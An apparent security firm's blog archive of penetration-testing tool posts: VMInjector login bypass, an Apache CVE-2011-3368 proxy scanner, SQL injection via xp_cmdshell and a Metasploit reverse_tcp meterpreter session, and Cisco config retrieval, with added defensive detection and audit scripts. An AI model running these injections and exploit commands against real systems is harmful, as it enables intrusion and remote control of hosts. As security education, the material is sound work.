Archive for the ‘Tools’ Category
VMInjector - DLL Injection tool to unlock guest VMs
Wednesday, November 14th, 2012
Overview:
VMInjector is a tool designed to bypass the OS login authentication screens of major operating systems running on VMware Workstation/Player by using direct memory manipulation.
Description:
VMInjector is a tool which manipulates the memory of VMware guests in order to bypass the operating system authentication screen.
VMware handles the resources allocated to guest operating systems, including RAM. VMInjector injects a DLL library into the VMware process to gain access to the mapped resources. The DLL library works by parsing the memory space owned by the VMware process and locating the memory-mapped RAM file, which corresponds to the guest's RAM image. By manipulating the allocated RAM file and patching the function in charge of the authentication, an attacker gains unauthorised access to the underlying virtual host.
VMInjector can currently bypass locked Windows, Ubuntu and Mac OS X operating systems.
The in-memory patching is non-persistent: rebooting the guest virtual machine restores the normal password functionality.
Attacking Scenarios:
VMInjector can be used if the password of a virtual host has been forgotten and needs to be reset.
More commonly, the tool is used during penetration testing activities, when access to a VMware host has been achieved and the tester is looking to gain additional access to the guests running on that host.
Requirements:
- Windows machine (with administrative access);
- VMware workstation or player edition;
- A locked guest VM;
Usage:
VMInjector consists of 2 parts:
- The DLL injection application (python script or provided converted executable)
- DLL library (x86 and x64)
The tool supports both x86 and x64 architectures by providing both DLLs. One may also use a different DLL injector to select the guest virtual machine running on the host.
In order to run the tool, execute the provided VMInjector (32- or 64-bit) executable from the command line, as shown in Figure 1.

Figure 1: List of running guest machines.
VMware runs each guest in a different process. VMInjector needs to be pointed to the process running the guest which requires the bypass. Once the user chooses a process, the tool injects the DLL into the chosen target.
Once the DLL is injected, the user will need to specify the OS, so that the memory patching can be accomplished, as shown in Figure 2.

Figure 2: Searching for OS signature in memory and patching.
Tool and Source Code:
The tool executable and source code can be found on GitHub (https://github.com/batistam/VMInjector)
Disclaimer:
This tool is for legal purposes only. The code is released under GPLv3 license.
Thanks and references:
I would like to thank Michael Ligh for his valuable research on injecting shellcode into guest virtual machines back in 2006.
I would also like to thank Carsten Maartmann-Moe for his work on Inception, a tool which can unlock locked Windows, Ubuntu and OS X machines by using the IEEE 1394 FireWire trick. This was first showcased by the (now obsolete) winlockpwn tool.
Credits:
Tool coded by Marco Batista
Download:
Please download this tool from GitHub
Tags: Penetration Testing, VMInjector, VMWare, VMWare security Posted in Penetration Testing, Security research, Tools
CVE-2011-3368 PoC - Apache Proxy Scanner
Monday, October 10th, 2011
A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network:
The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
SECFORCE has developed a proof of concept for this vulnerability, available for download from the security tools section of our website. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan through the web server using the Apache proxy functionality, thereby bypassing the firewall.
The following output shows the usage of the tool:
python apache_proxy_scanner.py
CVE-2011-3368 proof of concept by Rodrigo Marcos
http://www.secforce.co.uk
usage():
python apache_scan.py [options]
[options]
-r: Remote Apache host
-p: Remote Apache port (default is 80)
-u: URL on the remote web server (default is /)
-d: Host in the DMZ (default is 127.0.0.1)
-e: Port in the DMZ (enables 'single port scan')
-g: GET request to the host in the DMZ (default is /)
-h: Help page
examples:
- Port scan of the remote host
python apache_scan.py -r www.example.com -u /img/test.gif
- Port scan of a host in the DMZ
python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local
- Retrieve a resource from a host in the DMZ
python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local -e 80 -g /accounts/index.html
The tool can be used to perform a portscan of the target host in the following way:
python apache_proxy_scanner.py -r <target> -u <uri>
The following screenshot shows the result of the command above:
 Apache proxy port scan results
The script can be used to perform a bounce scan of a host in the DMZ or on the Internet:
python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d internalhost
python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d www.example.com
Apache_proxy_scanner will report open/filtered/closed ports in internal and external hosts.
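To make the mechanism behind CVE-2011-3368 concrete from the defender's side, the following Python example (added here; it is not part of the original post or of apache_proxy_scanner) models what a proxying RewriteRule does with a request-target that starts with "@", shows the hardened pattern that requires a leading "/", and flags such request lines in access-log entries. The backend host name, the internal host names and the log lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# Rewrite rules as (Python regex, Python substitution); Apache's $1 is Python's \1.
# "backend.internal" is a constructed placeholder, not a host from the post.
VULNERABLE_RULE = (r"^(.*)$", r"http://backend.internal\1")
#   Apache form:  RewriteRule ^(.*)$ http://backend.internal$1 [P]
HARDENED_RULE = (r"^/(.*)$", r"http://backend.internal/\1")
#   Apache form:  RewriteRule ^/(.*)$ http://backend.internal/$1 [P]


def proxied_host(rule, request_target):
    """Apply a proxy rewrite rule to a request-target and return the host the
    resulting URL really points at (None when the rule does not match).

    With the vulnerable rule, "GET @internalhost.local:80/x HTTP/1.0" becomes
    http://backend.internal@internalhost.local:80/x : the intended backend is
    now userinfo and the caller-chosen host is the real destination.  The
    hardened rule only matches origin-form targets, so the "@" form is dropped.
    """
    pattern, replacement = rule
    match = re.match(pattern, request_target)
    if match is None:
        return None
    return urlsplit(match.expand(replacement)).hostname


# Request line as written by Apache's %r: "METHOD target HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)"')


def suspicious_targets(log_lines):
    """Return request-targets that are neither origin-form ("/path") nor the
    "*" used by OPTIONS.  On a reverse proxy, a target beginning with "@" (or
    any other authority/absolute form) is the signature of this probing."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if match is None:
            continue
        target = match.group("target")
        if not (target.startswith("/") or target == "*"):
            hits.append(target)
    return hits


# Constructed sample access-log lines (combined log format, abbreviated).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2011:12:00:01 +0000] "GET /img/test.gif HTTP/1.1" 200 1234',
    '10.0.0.5 - - [10/Oct/2011:12:00:02 +0000] "GET @internalhost.local:80/accounts/index.html HTTP/1.0" 200 5678',
    '10.0.0.5 - - [10/Oct/2011:12:00:03 +0000] "GET @internalhost.local:22/ HTTP/1.0" 502 0',
]

if __name__ == "__main__":
    for rule_name, rule in (("vulnerable", VULNERABLE_RULE), ("hardened", HARDENED_RULE)):
        for target in ("/img/test.gif", "@internalhost.local:80/accounts/index.html"):
            print(f"{rule_name:10} {target:45} -> {proxied_host(rule, target)}")
    print("flagged:", suspicious_targets(SAMPLE_LOG))
```

The same leading-"/" check is the reason the fixed Apache releases and the commonly recommended RewriteRule/ProxyPassMatch patterns anchor on "^/": once the pattern cannot match a target that begins with "@", no userinfo can be smuggled into the proxied URL.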
Tags: Apache, apache_proxy_scanner, CVE-2011-3368, mod_proxy, mod_rewrite, Penetration Testing, PoC, SECFORCE Posted in Penetration Testing, Tools, Vulnerabilities
GUI manipulation and penetration testing
Friday, July 15th, 2011
Whilst in the web application development world it is becoming very well understood that “you should never trust the data from the client side”, this is not always the case in local applications.
In web environments any restriction enforced at the client side can be easily bypassed with the use of a web proxy. However, security mechanisms enforced in desktop applications can sometimes also be manipulated to perform unauthorised actions.
During a recent penetration test we found a desktop application whose security needed to be assessed. GUI manipulation was used to conduct a number of attacks.
The tool of choice for this particular attack was "DARKER's Enabler":
 Denabler used for GUI manipulation
DARKER's Enabler is a tool for showing and enabling objects (controls) in Windows applications.
The application under test had a number of disabled fields that needed to be modified for the purpose of the penetration test. Specifically, the "Encrypt" checkbox needed to be unchecked, but the application showed the field as disabled:
 Original application window
With Denabler we dragged and dropped the red square onto the target application in order to identify the window handle of the field, and then enabled it:
 Denabler in action
This enabled the field and allowed the penetration testers to disable the encryption in the application, which proved vital to the outcome of the penetration test:
 Window after enabling the fields
As shown above, GUI manipulation can lead to unwanted consequences. Extra caution needs to be exercised during the planning and development process to minimize the risk of GUI manipulation.
Tags: application manipulation, application penetration testing, application security, Denabler, desktop security, GUI, gui manipulation, gui penetration test, Penetration Testing Posted in Penetration Testing, Tools
SECFORCE invited to present at Athcon
Saturday, June 18th, 2011
SECFORCE was invited to present at the Athcon conference, held in Athens on 2nd and 3rd June 2011.
AthCon is an annual IT security conference that takes place in Athens, Greece, designed to give technical insight into the world of IT security: a realistic, practical view of current and evolving threats and security trends, presented by top international security experts.
SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features.
The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements.
You can download the slides from the talk from our security research area.
Tags: Athcon, exploitation, metasploit, Penetration Testing, post-exploitation, presentations Posted in Penetration Testing, SECFORCE, Tools
Exploiting SQL injection vulnerabilities with Metasploit
Thursday, January 27th, 2011
In this post we are going to show how to exploit a SQL injection vulnerability in a web application with a Microsoft SQL Server backend where xp_cmdshell is available to the attacker.
During a penetration test of a web application it is identified that the application is vulnerable to SQL injection attacks and that the penetration tester can execute administrative stored procedures:
http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell 'ping 192.168.1.64';--
If the request shown above is successful then arbitrary commands can be executed on the host. At this point there are a number of options that would allow the tester to fully compromise the server, and there are public tools which can help automate the takeover process. This post covers the use of a Metasploit module.
The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter, one of the payloads that offers the greatest flexibility to the penetration tester.
It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by setting the GET_PATH variable to the vulnerable URL with an [SQLi] token in place of the injected statement; the token marks where the payload will be executed. The rest of the exploitation process is the same as for any other vulnerability. This is the exploitation based on the URL shown above:
msf > use windows/mssql/mssql_payload_sqli
msf exploit(mssql_payload_sqli) > set GET_PATH http://192.168.1.66/showproduct.asp?id=1;[SQLi];--
GET_PATH => http://192.168.1.66/showproduct.asp?id=1;[SQLi];--
msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64
LHOST => 192.168.1.64
msf exploit(mssql_payload_sqli) > set LPORT 80
LPORT => 80
msf exploit(mssql_payload_sqli) > exploit
After the exploitation the attacker will get a meterpreter shell.
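From the blue-team side, the injected request above has a recognisable shape in web server logs: a stacked query (";exec ..."), a call to an xp_ extended stored procedure and a trailing comment terminator, usually URL-encoded. The following Python example, added here and not part of the original post, URL-decodes the query-string values of access-log request lines and scores those three indicators, so that a lone mention of "xp_cmdshell" in a search box does not fire but the stacked-query form used in this post does. The log lines are constructed samples; the scoring weights and threshold are assumptions to be tuned per environment.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not real traffic from the post).
SAMPLE_LOG = [
    '192.168.1.64 - - [27/Jan/2011:10:00:01 +0000] "GET /showproduct.asp?id=1 HTTP/1.1" 200 812',
    '192.168.1.64 - - [27/Jan/2011:10:00:02 +0000] "GET /showproduct.asp?id=1;exec%20master..xp_cmdshell%20%27ping%20192.168.1.64%27;-- HTTP/1.1" 200 812',
    '192.168.1.64 - - [27/Jan/2011:10:00:03 +0000] "GET /showproduct.asp?id=1%3Bexec+master..xp_cmdshell+%27dir%27%3B-- HTTP/1.1" 500 0',
    '192.168.1.64 - - [27/Jan/2011:10:00:04 +0000] "GET /search.asp?q=xp_cmdshell+tutorial HTTP/1.1" 200 2048',
]

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/\d\.\d"')
# ";" followed by a statement keyword: a second statement appended to the original query.
STACKED_QUERY = re.compile(r";\s*(?:exec(?:ute)?|declare|select|insert|update|delete|drop|waitfor)\b", re.I)
# Any extended stored procedure (xp_cmdshell, xp_regread, ...).
EXTENDED_PROC = re.compile(r"\bxp_\w+", re.I)
# Comment terminator used to discard the rest of the original statement.
COMMENT_TERMINATOR = re.compile(r"(?:--|/\*)\s*$")


def decoded_values(target):
    """Return the URL-decoded values of every query-string parameter.
    The query is split on '&' only, so ';' inside a value survives for matching."""
    query = urlsplit(target).query
    values = []
    for pair in query.split("&"):
        _name, _sep, value = pair.partition("=")
        values.append(unquote_plus(value))
    return values


def score_value(value):
    """Assumed weights: stacked query 2, xp_ procedure 2, comment terminator 1."""
    score = 0
    if STACKED_QUERY.search(value):
        score += 2
    if EXTENDED_PROC.search(value):
        score += 2
    if COMMENT_TERMINATOR.search(value):
        score += 1
    return score


def scan_log(lines, threshold=3):
    """Return (request-target, score) for every request whose most suspicious
    parameter value reaches the threshold."""
    hits = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if match is None:
            continue
        target = match.group("target")
        score = max((score_value(v) for v in decoded_values(target)), default=0)
        if score >= threshold:
            hits.append((target, score))
    return hits


if __name__ == "__main__":
    for target, score in scan_log(SAMPLE_LOG):
        print(f"score={score} {target}")
```

Detection of this kind is a backstop; the real fix for the application above is a parameterised query for the id parameter and, on the database side, leaving xp_cmdshell disabled and running the web application's login without sysadmin rights, so that the stored procedure cannot be executed even when the injection exists.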
 SQL injection exploitation with Metasploit
If you want to use this code you can download it from the SECFORCE security tools repository.
Tags: exploitation, metasploit, ms sql server, Penetration Testing, sql injection Posted in Penetration Testing, SECFORCE, SQL Server, Tools, Vulnerabilities, exploit, sql injection
Exploiting MS09-004 via SQL injection
Monday, January 24th, 2011
Recently we were performing a web application penetration test for one of our clients and identified a SQL injection vulnerability. The vulnerability allowed us to conduct a degree of fingerprinting on the remote server; however, the Microsoft SQL Server back-end database didn't allow us to execute commands via the well-known xp_cmdshell stored procedure.
Based on the fingerprinting information we identified that the database server was running an old and vulnerable version of MS SQL Server. Microsoft SQL Server 2000 SP3, to be precise.
Everything indicated that the server was vulnerable to the MS09-004 vulnerability. However, it was not possible to get direct access to the database. Moreover, no authentication credentials were discovered during the course of the assessment.
This is how our newly released Metasploit module was born. We coded an extension which can be added to Metasploit to exploit this vulnerability through a SQL injection vulnerability with no need for credentials, as the web application authenticates on our behalf.
 Penetration testing - SQL injection exploitation
The screenshot above shows how to get meterpreter (or any other payload of your choice) exploiting the vulnerability from Metasploit.
If interested, get the scripts from our security tools area.
Tags: exploitation, metasploit, MS09-004, SECFORCE, sql injection, Tools Posted in Penetration Testing, Tools, exploit
Metasploit and SQL injection
Monday, January 17th, 2011
SECFORCE has released a set of scripts that enhance Metasploit's functionality when exploiting SQL injection vulnerabilities. This is particularly useful in two scenarios:
- When an attacker achieves command execution on a database via SQL injection, but wants all the functionality offered by Metasploit.
- When the attacker identifies that the backend SQL server is vulnerable to MS09-004 but has no credentials or direct access to the database.
Tags: metasploit, MS09004, Penetration Testing, sql injection, Tools Posted in Penetration Testing, SECFORCE, Tools
Cisco config retrieval tool and password reuse
Wednesday, October 8th, 2008
The other day we were at a client site doing a penetration test. This was a very big deployment with almost 100 routers. At some point during the test we managed to get the read/write community string of one of the routers, as there was a script with the hard-coded credentials.

We managed to connect to the router with the SNMP credentials and pulled the Cisco config file. After that, we decoded the telnet and enable passwords and we were ready to go. We tried (with not much hope initially) a couple of other routers, reusing the telnet password, and they all worked. Every single router was protected with exactly the same password.
We had limited time and the prospect of telnetting to 100 routers and pulling config files was not very appealing, so we wrote a nice Python script to pull them for us. We released the tool in our research section, so check it out if you are interested.
The lesson to learn here is that, no matter how confident you are about the strength of your password, it can potentially be compromised, and if you are reusing it the impact for the business becomes critical.
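The weaknesses that made this engagement work (a read/write community string, reversibly encoded type 7 line passwords, and the same credentials on every device) can all be caught by auditing the configs themselves. The following Python example, added here and not part of the original post or of the released tool, audits a small fleet of Cisco IOS configs: it flags enable password instead of enable secret, type 7 or cleartext line passwords, and RW SNMP communities, and it reports community strings shared by more than one device. The configs are constructed samples and the type 7 strings are placeholders, not real encodings.

```python
import re
from collections import defaultdict

# Constructed sample configs; the "7 ..." and "5 ..." values are placeholders.
SAMPLE_CONFIGS = {
    "router1": """\
hostname router1
enable password 7 0123456789AB
snmp-server community public RO
snmp-server community s3cret RW
line vty 0 4
 password 7 ABCDEF012345
 login
""",
    "router2": """\
hostname router2
enable secret 5 $1$placeholder$hashvalue
snmp-server community public RO
snmp-server community s3cret RW
line vty 0 4
 password cisco
 login
""",
    "router3": """\
hostname router3
enable secret 5 $1$placeholder$hashvalue
snmp-server community public RO
line vty 0 4
 login local
""",
}

ENABLE_PASSWORD = re.compile(r"^enable password\b")
# "password [type] value" under line/console/aux; type 7 is reversible, 0 or none is cleartext.
LINE_PASSWORD = re.compile(r"^\s*password(?: (?P<type>\d))? (?P<value>\S+)$")
SNMP_COMMUNITY = re.compile(r"^snmp-server community (?P<name>\S+)(?: (?P<mode>RO|RW))?", re.I | re.M)


def audit_config(text):
    """Return a list of (severity, message) findings for one device config."""
    findings = []
    for line in text.splitlines():
        if ENABLE_PASSWORD.match(line):
            findings.append(("high", "enable password used instead of enable secret"))
        pw = LINE_PASSWORD.match(line)
        if pw:
            if pw.group("type") == "7":
                # Type 7 is the reversible encoding the post's "decoded the passwords" step relies on.
                findings.append(("high", "type 7 line password (reversible encoding)"))
            else:
                findings.append(("high", "cleartext line password"))
        snmp = SNMP_COMMUNITY.match(line)
        if snmp and (snmp.group("mode") or "RO").upper() == "RW":
            findings.append(("critical", f"read/write SNMP community '{snmp.group('name')}'"))
    return findings


def audit_fleet(configs):
    """Per-device findings plus SNMP community strings shared by more than one device."""
    per_device = {name: audit_config(text) for name, text in configs.items()}
    devices_by_community = defaultdict(set)
    for name, text in configs.items():
        for match in SNMP_COMMUNITY.finditer(text):
            devices_by_community[match.group("name")].add(name)
    reused = {c: sorted(d) for c, d in devices_by_community.items() if len(d) > 1}
    return per_device, reused


if __name__ == "__main__":
    per_device, reused = audit_fleet(SAMPLE_CONFIGS)
    for name, findings in per_device.items():
        for severity, message in findings:
            print(f"{name}: [{severity}] {message}")
    for community, devices in reused.items():
        print(f"community '{community}' reused on: {', '.join(devices)}")
```

Community strings are stored in cleartext, so reuse across devices is visible directly; type 7 and enable secret values carry per-device salts, so password reuse for those can only be confirmed the way the post did it, which is exactly why storing line passwords with type 7 is the finding worth fixing first.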
Tags: cisco, cisco config, Penetration Testing, Tools Posted in Penetration Testing, Tools